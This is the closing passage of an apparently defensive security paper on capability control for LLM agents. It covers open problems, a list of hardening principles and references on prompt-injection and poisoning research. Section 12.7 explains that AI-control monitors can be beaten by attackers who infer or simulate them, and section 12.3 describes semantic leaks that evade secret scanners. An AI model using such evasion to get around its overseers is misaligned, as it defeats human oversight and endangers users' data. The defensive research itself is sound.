- Human approval record.
- Sandbox ID.
- External sink destination.
- Redacted content hash.
Without provenance, incident response cannot distinguish a model mistake from an injection-driven flow.
12. Open Problems
12.1 Automatic Least-Privilege Inference
Developers do not want to hand-author policies for every task. The field needs systems that infer minimum viable capabilities from task descriptions, historical traces, and workflow definitions, then produce reviewable policy. The hard part is avoiding under-scoped policies that break utility and over-scoped policies that recreate ambient authority.
12.2 Robust Declassification
Many useful tasks require moving confidential data to authorized sinks. IFC systems need principled declassification: who approved it, for what purpose, at what granularity, to which recipient, with what transformations, and for how long.
12.3 Semantic Data Laundering
A model can leak without copying. “The password is the name of the founder’s dog plus 2024” may evade literal secret scanners. Summaries, classifications, embeddings, and choices among allowed actions can all encode sensitive facts. Detecting semantic leakage remains unsolved.
12.4 Multi-Agent Capability Propagation
Agent-to-agent systems create delegation problems. If Agent A has private data and Agent B has external-send authority, their composition may recreate the lethal trifecta. Capability delegation needs attenuation, non-transferability, and provenance across agent boundaries.
12.5 Usable Human Approval
Approval fatigue is a security vulnerability. Research is needed on approval interfaces that show provenance, risk, and diffed effects in a form humans can evaluate quickly.
12.6 Standardized Tool Attestation
MCP-like ecosystems need signed tool descriptors, reproducible builds, semantic versioning of capabilities, vulnerability feeds, registry trust, and runtime attestation. Without this, tool poisoning and rug pulls remain structurally easy.
12.7 AI Control and Monitor Robustness
AI-control protocols use trusted models, monitors, resampling, deferral, and editing to supervise more capable untrusted models. The approach is promising, but monitor-based protocols are vulnerable to adaptive attacks when the attacker can infer or simulate the monitor. Recent work on untrusted-agent control found that red-team affordances such as knowledge of resampling can substantially reduce safety for some protocols, while deferring critical actions to trusted policies is more robust (AI Control, ICML 2024; Evaluating Control Protocols for Untrusted AI Agents, 2025). Capability control should therefore treat monitors as advisory risk signals, not as sole authorization mechanisms. (proceedings.mlr.press)
13. The Defensible Position
The defensible position for 2026 is simple:
- Treat the LLM planner as untrusted.
- Treat all external content as instructions-capable data.
- Treat tool calls as untrusted outputs requiring authorization.
- Remove ambient authority.
- Mint narrow, expiring capabilities per task.
- Enforce policy outside the model.
- Track information flows from sources to sinks.
- Sandbox untrusted computation and tool servers.
- Require explicit declassification for confidential data.
- Evaluate with adaptive, multi-step, production-like attacks.
This does not make agents perfectly safe. It changes the failure mode. Without capability control, a prompt injection can become an authorized action. With capability control, the same injection becomes a denied tool call, a quarantined memory, a blocked egress attempt, or an approval request with provenance. That is the difference between hoping the model behaves and engineering a security boundary.
References
- Alizadeh, Meysam; Samei, Zeynab; Stetsenko, Daria; Gilardi, Fabrizio. “Simple Prompt Injection Attacks Can Leak Personal Data Observed by LLM Agents During Task Execution.” arXiv, 2025. https://arxiv.org/abs/2506.01055
- Amazon Q Developer Extension incident coverage. “Amazon's AI coding agent was hacked.” TechRadar, 2025. https://www.techradar.com/pro/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands
- Chen, Zhaorun; Xiang, Zhen; Xiao, Chaowei; Song, Dawn; Li, Bo. “AgentPoison: Red-teaming LLM Agents via Poisoning Memory or Knowledge Bases.” NeurIPS, 2024. https://arxiv.org/abs/2407.12784
- Costa, Manuel; Köpf, Boris; Kolluri, Aashish; Paverd, Andrew; Russinovich, Mark; Salem, Ahmed; Tople, Shruti; Wutschitz, Lukas; Zanella-Béguelin, Santiago. “Securing AI Agents with Information-Flow Control.” arXiv, 2025. https://arxiv.org/abs/2505.23643
- Debenedetti, Edoardo; Shumailov, Ilia; Fan, Tianqi; Hayes, Jamie; Carlini, Nicholas; Fabian, Daniel; Kern, Christoph; Shi, Chongyang; Terzis, Andreas; Tramèr, Florian. “Defeating Prompt Injections by Design.” arXiv, 2025. https://arxiv.org/abs/2503.18813
- Debenedetti, Edoardo; Zhang, Jie; Balunović, Mislav; Beurer-Kellner, Luca; Fischer, Marc; Tramèr, Florian. “AgentDojo: A Dynamic Environment to Evaluate Prompt Injection Attacks and Defenses for LLM Agents.” NeurIPS Datasets and Benchmarks, 2024. https://arxiv.org/abs/2406.13352
- Docker. “Seccomp security profiles for Docker.” Docker Docs, accessed 2026. https://docs.docker.com/engine/security/seccomp/
- Firecracker maintainers. “Firecracker: Secure and fast microVMs for serverless computing.” GitHub, accessed 2026. https://github.com/firecracker-microvm/firecracker
- GitHub Advisory Database. “MCP Server Kubernetes vulnerable to command injection in several tools.” CVE-2025-53355 / GHSA-gjv4-ghm7-q58q, 2025. https://github.com/advisories/GHSA-gjv4-ghm7-q58q
- GitHub Advisory Database. “mcp-package-docs vulnerable to command injection in several tools.” CVE-2025-54073 / GHSA-vf9j-h32g-2764, 2025. https://github.com/advisories/GHSA-vf9j-h32g-2764
- Google gVisor project. “What is gVisor?” gVisor Docs, accessed 2026. https://gvisor.dev/docs/
- Greenblatt, Ryan; Shlegeris, Buck; Sachan, Kshitij; Roger, Fabien. “AI Control: Improving Safety Despite Intentional Subversion.” ICML, 2024. https://proceedings.mlr.press/v235/greenblatt24a.html
- Invariant Labs. “GitHub MCP Exploited: Accessing private repositories via MCP.” 2025. https://invariantlabs.ai/blog/mcp-github-vulnerability
- Microsoft Security Response Center / Aim Security coverage. “Microsoft 365 Copilot zero-click vulnerability enabled data exfiltration.” CVE-2025-32711 / EchoLeak, 2025. https://www.scworld.com/news/microsoft-365-copilot-zero-click-vulnerability-enabled-data-exfiltration
- Model Context Protocol. “Authorization.” MCP Specification, 2025-06-18. https://modelcontextprotocol.io/specification/2025-06-18/basic/authorization
- Model Context Protocol. “Understanding Authorization in MCP.” MCP Docs, accessed 2026. https://modelcontextprotocol.io/docs/tutorials/security/authorization
- National Vulnerability Database. “CVE-2025-68143.” NIST NVD, 2025/2026. https://nvd.nist.gov/vuln/detail/CVE-2025-68143
- Ntousakis, Grigoris; Stephen, Julian James; Le, Michael; Chukkapalli, Sai Sree Laya; Taylor, Teryl; Molloy, Ian; Araujo, Fred. “Securing MCP-based Agent Workflows.” SOSP Workshop, 2025. https://research.ibm.com/publications/securing-mcp-based-agent-workflows
- Wang, Zhun; Siu, Vincent; Ye, Zhe; Shi, Tianneng; Nie, Yuzhou; Zhao, Xuandong; Wang, Chenguang; Guo, Wenbo; Song, Dawn. “AgentVigil: Generic Black-Box Red-teaming for Indirect Prompt Injection against LLM Agents.” arXiv, 2025. https://arxiv.org/abs/2505.05849
- WebAssembly Community Group. “Security.” WebAssembly Docs, accessed 2026. https://webassembly.org/docs/security/
- Zhan, Qiusi; Liang, Zhixiang; Ying, Zifan; Kang, Daniel. “InjecAgent: Benchmarking Indirect Prompt Injections in Tool-Integrated Large Language Model Agents.” Findings of ACL, 2024. https://arxiv.org/abs/2403.02691
- Richards, Jer. “secure-agent-ref: Reference implementation of agent capability control.” GitHub, 2026. https://github.com/binaryninja/secure-agent-ref
- Zou, Wei; Geng, Runpeng; Wang, Binghui; Jia, Jinyuan. “PoisonedRAG: Knowledge Corruption Attacks to Retrieval-Augmented Generation of Large Language Models.” USENIX Security, 2025. https://www.usenix.org/conference/usenixsecurity25/presentation/zou